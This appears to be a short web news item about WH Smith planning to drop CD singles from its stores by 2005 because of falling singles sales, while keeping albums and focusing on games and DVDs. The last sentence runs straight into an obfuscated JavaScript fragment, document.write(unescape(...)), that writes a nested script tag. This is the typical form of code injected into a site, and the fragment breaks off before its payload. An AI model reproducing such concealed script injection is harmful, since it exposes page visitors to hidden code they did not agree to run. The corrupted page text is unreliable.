WH Smith, one of the oldest brands on the UK high street are reportedly planning to drop CD singles from their stores by the end of next year (2005). The leading retail group, which has 1,464 stores world-wide has suffered from stiff competition from supermarkets and online sales and have they have also seen reduced profits as a company.
The UK music industry has generally suffered over the last few years with sales of CDs. The British Phonographic Industry's figures state that around 36.5 million singles were sold in 2003. This is a 31% decrease on the previous year.
However album sales have increased by more than 5% and W H Smith's do not intend to drop them form their range. They will also concentrate more on games and DVDs sales as they have seen an increase over the last year.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
